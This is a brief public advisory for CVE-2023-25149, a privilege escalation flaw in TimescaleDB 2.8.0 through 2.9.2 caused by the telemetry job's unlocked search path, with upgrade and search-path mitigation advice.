CVE-2023-25149

Name of the Vulnerable Software and Affected Versions TimescaleDB versions 2.8.0 through 2.9.2

Description TimescaleDB has a privilege escalation issue due to the telemetry job running with an unlocked search path, allowing malicious users to create functions that would be executed by the telemetry job. To exploit this, a user needs to be able to create objects in a database and then get a superuser to install TimescaleDB into their database. When installed as a trusted extension, non-superusers can install it without help from a superuser. The issue is not exploitable on instances in Timescale Cloud and Managed Service for TimescaleDB due to additional security provisions.

Recommendations For versions 2.8.0 through 2.9.2, update to version 2.9.3 to fix the issue. As a mitigation, lock down the search path of the user running the telemetry job to not include schemas writable by other users.